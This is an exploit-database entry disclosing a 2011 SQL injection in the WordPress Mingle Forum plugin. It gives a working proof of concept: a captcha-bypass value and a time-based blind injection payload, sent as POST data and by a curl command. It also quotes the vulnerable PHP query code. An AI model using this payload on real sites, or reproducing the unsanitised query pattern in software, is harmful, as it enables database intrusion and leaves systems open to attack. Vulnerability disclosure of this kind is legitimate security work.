header-logo
Suggest Exploit
vendor:
Mingle Forum plugin
by:
Miroslav Stampar
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Mingle Forum plugin
Affected Version From: 1.0.0
Affected Version To: 1.0.31
Patch Exists: NO
Related CWE:
CPE: a:wordpress:mingle_forum:1.0.31
Metasploit:
Other Scripts:
Platforms Tested: WordPress
2011

WordPress Mingle Forum plugin <= 1.0.31 SQL Injection Vulnerability

This vulnerability allows an attacker to inject SQL queries into the WordPress Mingle Forum plugin version 1.0.31. By manipulating the POST data, an attacker can execute arbitrary SQL queries, potentially leading to unauthorized access or data leakage.

Mitigation:

Upgrade to a newer version of the Mingle Forum plugin that has fixed the SQL injection vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Mingle Forum plugin <= 1.0.31 SQL Injection Vulnerability
# Date: 2011-09-19
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/mingle-forum.1.0.31.zip
# Version: 1.0.31 (tested)
# Note: wpf_str_encrypt($_POST['wpf_security_code']) == $_POST['wpf_security_check']

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php
 wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

e.g.
curl --data "wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php

---------------
Vulnerable code
---------------
    if (!isset($_POST['edit_post_submit'])) {
        $errormsg = apply_filters('wpwf_check_guestinfo',"");
        if ($errormsg != "") {
            $error = true;
            wp_die($errormsg);
        }
    }

    if($options['forum_captcha'] == true && !$user_ID){
        include_once(WPFPATH."captcha/shared.php");
        $wpf_code = wpf_str_decrypt($_POST['wpf_security_check']); // wpf_str_decrypt("MhWNow==") == "fail"
            if(($wpf_code == $_POST['wpf_security_code']) && (!empty($wpf_code))) {
              // do nothing
            }
            else {
                $error = true;
                $msg = __("Security code does not match", "mingleforum");
                wp_die($msg);
            }
    }

    ...

    if(isset($_POST['edit_post_submit'])){
        $myReplaceSub = array("'", "\\");
        $subject = str_replace($myReplaceSub, "", $mingleforum->input_filter($_POST['edit_post_subject']));
        $content = $mingleforum->input_filter($_POST['message']);
        $thread = $mingleforum->check_parms($_POST['thread_id']);
        $edit_post_id = $_POST['edit_post_id'];

        if($subject == ""){
            $msg .= "<h2>".__("An error occured", "mingleforum")."</h2>";
            $msg .= ("<div id='error'><p>".__("You must enter a subject", "mingleforum")."</p></div>");
            $error = true;
        }
        elseif($content == ""){
            $msg .= "<h2>".__("An error occured", "mingleforum")."</h2>";
            $msg .= ("<div id='error'><p>".__("You must enter a message", "mingleforum")."</p></div>");
            $error = true;
        }

        if ($error) wp_die($msg);

        //SECURITY FIX NEEDED <-- actual author's comment :)
        $sql = ("UPDATE $mingleforum->t_posts SET text = '$content', subject = '$subject' WHERE id = $edit_post_id");
        $wpdb->query($wpdb->prepare($sql)); // misusage of prepare statement(s)